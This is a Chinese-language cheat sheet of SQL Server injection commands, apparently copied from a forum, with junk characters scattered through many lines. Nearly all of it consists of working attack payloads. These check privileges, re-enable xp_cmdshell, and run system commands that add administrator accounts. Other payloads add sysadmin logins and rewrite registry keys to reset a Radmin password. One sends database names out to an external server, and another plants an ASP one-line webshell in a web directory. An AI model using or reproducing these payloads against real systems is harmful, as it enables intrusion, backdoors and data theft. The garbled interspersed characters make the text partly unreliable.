常用的一些注入命令

admin

//看看是什么权限的
2 g1 m8 w' }2 E: G" jand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

8 D- W2 ~8 s% a. R//检测是否有读取某数据库的权限
' U8 j" V" S& v$ B! z( W0 [0 Fand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
; @7 E. j- b. ~7 C( T

数字类型
8 h# j: O) i. K* ^& p% w: \' n5 M; _and char(124)%2Buser%2Bchar(124)=0

+ a% S7 x' O- k8 ~2 K  w/ Z字符类型
; v  Z0 ]- p  q2 f' and char(124)%2Buser%2Bchar(124)=0 and ''='

, u" K! }! a8 A; M* {. H( _1 H+ i搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

1 H" b) L9 U  ]2 l! U  U爆用户名
and user>0
# I5 P$ s4 h# n/ a" ~' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: r* ]3 E0 h6 m9 S' gAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
9 X* a$ z9 Z& i5 V/ x- {
检测是不是MSSQL数据库
and exists (select * from sysobjects);--

0 i4 {& o& a8 i, T7 u4 h检测是否支持多行
- E+ [# n0 b+ f& O, Z  ]& S;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
5 H: X: P' p: E$ @# L! J
. i5 \" Q; h% h; h3 {
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
; W7 h+ k. x" a! D1 _* A" S
//-----------------------
//       执行命令
//-----------------------
首先开启沙盘模式：
2 v2 c3 `! m4 i1 Nexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
( Z! |+ f) ^  `
# @- d3 [) _7 C! {然后利用jet.oledb执行系统命令
9 W) [% W: i! Z5 _2 n! Hselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
6 {: p$ w4 u% r8 z6 Y7 f
, o, k" b5 b' Y4 f+ k执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

8 M, }7 C$ t+ S# W0 w- ]: U6 GEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
1 `+ m  x( m. c% I1 E
" I/ F! Z+ u  z$ v& S" D' e' W写注册表
  {' R; D* W/ ~; f! Pexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, L7 D4 n, P/ J' ~
REG_SZ
" ?& ~6 W: h9 z3 \* }3 n
读注册表
, D2 ^4 N; M' T4 t) _8 zexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
7 A" T2 U/ y! _9 b4 Z1 T/ x7 X
读取目录内容
6 V% h$ ]  K0 k  O3 j3 iexec master..xp_dirtree 'c:\winnt\system32\',1,1

9 ]3 h8 {$ C2 q* r
数据库备份
. o, X& }$ C' K1 c# g" s- kbackup database pubs to disk = 'c:\123.bak'

//爆出长度
+ N, C3 y6 M0 |And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
+ L8 Z' C$ {9 F$ E" i) }% p

5 U6 W" L- p$ I, ^0 M9 V
更改sa口令方法：用sql综合利用工具连接后，执行命令：
- K. Y* S- s" s  ]% Z& n- Uexec sp_password NULL,'新密码','sa'
( S6 Y6 q0 O  L' a+ ^5 F% K+ }
1 c; z% m2 ^8 q( V添加和删除一个SA权限的用户test：
+ n) S5 X. n6 |) S( y; Qexec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
' i7 x! _: |. X4 b# X8 @2 s
删除扩展存储过过程xp_cmdshell的语句:
& v' S3 p, v' F4 _1 x8 P( I! J8 j2 oexec sp_dropextendedproc 'xp_cmdshell'

  U% `# M* [9 q5 v7 k4 o8 ?添加扩展存储过过程
/ ?  m, H8 H' ]) J$ ZEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
0 H! d  {( m. i5 O$ C8 y" O& DGRANT exec On xp_proxiedadata TO public
/ D: d, x: e# d6 K% u% k/ e

停掉或激活某个服务。
; p0 K' Q7 Q5 C" N
exec master..xp_servicecontrol 'stop','schedule'
# g' t5 M' w  I% A! Z% F1 t5 F" kexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
/ m' B0 Z2 t" b6 ]/ ixp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

3 ^* y5 z* |  u  rdbo.xp_makecab
3 h+ T; a9 {! w4 q+ R
. e( Z' K# Y* g; F5 U( ?: H将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
/ l6 F4 |8 V4 k, H( G- P9 g* ~'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

2 K! Y1 M8 s+ y+ L5 a8 S( Bxp_terminate_process
' ^& |7 J7 ~0 E$ `
停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

; v1 i2 d8 u1 H( b" o* Qxp_terminate_process 2484
% U! |- w" l2 @/ ?- b- D- Q9 c
8 o: X4 P8 p( Y1 ixp_unpackcab
9 x5 @5 A& I2 ]" I% |
解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1
+ p+ |& C, A) K- T( }2 a
( Z6 [! A8 Z! P1 c) M  v8 c4 Y
& R1 z( _) k- {5 x( D+ m8 Y某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% k$ y8 F9 c6 C9 u
: ?3 l- E6 P% C& L% b# K& lcreate database lcx;
Create TABLE ku(name nvarchar(256) null);
0 I3 V, m- ^3 H# v+ {# P9 pCreate TABLE biao(id int NULL,name nvarchar(256) null);

5 v+ J% g: N% ]9 \1 W//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
* ]" S0 `7 a  k- T+ ^

//在Master中创建表，看看权限怎样
  P* Z' f( T& u; x( OCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
: L8 G4 j/ g; w1 `4 l
, O/ [6 P0 \0 g0 y' [) h用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
( v& B( m$ ^. s7 P  W
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

% `" O) y. ^/ U" w//删除内容
delete from table_name where Stockid = 3